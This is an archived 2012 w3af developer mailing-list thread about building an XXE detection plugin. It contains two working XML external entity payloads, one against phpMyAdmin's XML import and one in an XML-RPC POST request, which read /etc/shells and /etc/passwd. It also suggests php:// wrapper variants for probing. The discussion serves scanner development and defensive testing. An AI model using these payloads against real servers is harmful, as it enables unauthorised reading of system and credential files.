Hi, list. The latest one case which I had was XXE in PHPMyAdmin, which allow reading files after export with special crafted *.xml file and exploit looked like this:
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE ficheiro [ <!ENTITY xxe SYSTEM "file:///etc/shells" > ]> <pma_xml_export version="1.0" xmlns:pma="http://www.phpmyadmin.net/some_doc_url/";> <pma:structure_schemas> <pma:database name="test" collation="utf8_general_ci" charset="utf8"> <pma:table name="test_tbl"> CREATE TABLE `test_tbl` (`file` varchar(20000) NOT NULL); </pma:table> </pma:database> </pma:structure_schemas> <database name="test"> <table name="test_tbl"> <column name="file">&xxe;</column> </table> </database> </pma_xml_export> I think that it is totally not obvious thing to make detection of such things in audit plugins implemented - due to logic of outputting the result in table. Andres, you wrote: > So our audit plugin should send the xml with the external entity as the > post-data to all URLs? I think that this way can be used only in small count of cases where content of files echoed right on the same page which was processed *.xml. Also, I think that it has to be at least 2 checks - first one for reading local file and another one for trying using some protocols - http, for example, instead file:///. Except this, I think that firstly (before checking direct file:///) we must to check possibility to read file using wrapper php:// and base64 convertation. So, I think, that checking process must be realized as minimum not only for file:///. -----Original Message----- From: Andres Riancho [mailto:andres.rian...@gmail.com] Sent: Tuesday, August 28, 2012 12:14 AM To: w3af-us...@lists.sourceforge.net; w3af-develop@lists.sourceforge.net; Carlos Pantelides; Achim Hoffmann; Taras P. Ivashchenko Subject: [W3af-develop] Xml eXternal Entity Lists, I've been playing around with the idea of writing an XXE [0] detection plugin for w3af all evening, but I can't really decide if it is worth it. Have you guys seen these type of vulnerabilities in the wild? If so, how? Most of the public vulnerabilities I see are exploited in this form: """ POST /xmlrpc_server.php HTTP/1.1 Host: $host <?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT methodName ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <methodCall> <methodName>&xxe;</methodName> </methodCall> """ Which basically means that the vulnerable source code looks like: """ <? ... $xml = simplexml_load_file("php://input"); ... echo $some_part_of_the_xml; ?> """ So our audit plugin should send the xml with the external entity as the post-data to all URLs? I can't find a realistic example where it would make sense to send the custom-xml to one of these: - Query string parameter: http://host/index.aspx?id=<?xml...> - HTML Form with url-encoding: http://host/index.aspx with post-data name=<?xml...>&lastname=doe&age=32 - HTML Form with file input, where the uploaded file contains the XML (could... maybe work in some cases... but most likely the /etc/passwd file won't be echoed back in the response). What do you think? Ideas? [0] https://www.owasp.org/index.php/Testing_for_XML_Injection_%28OWASP-DV-008%29 Regards, -- Andrés Riancho Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework Twitter: @w3af GPG: 0x93C344F3 ------------------------------------------------------------------------------ Live Security Virtual Conference Exclusive live event will cover all the ways today's security and threat landscape has changed and how IT managers can respond. Discussions will include endpoint security, mobile security and the latest in malware threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ _______________________________________________ W3af-develop mailing list W3af-develop@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/w3af-develop ------------------------------------------------------------------------------ Live Security Virtual Conference Exclusive live event will cover all the ways today's security and threat landscape has changed and how IT managers can respond. Discussions will include endpoint security, mobile security and the latest in malware threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ _______________________________________________ W3af-develop mailing list W3af-develop@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/w3af-develop
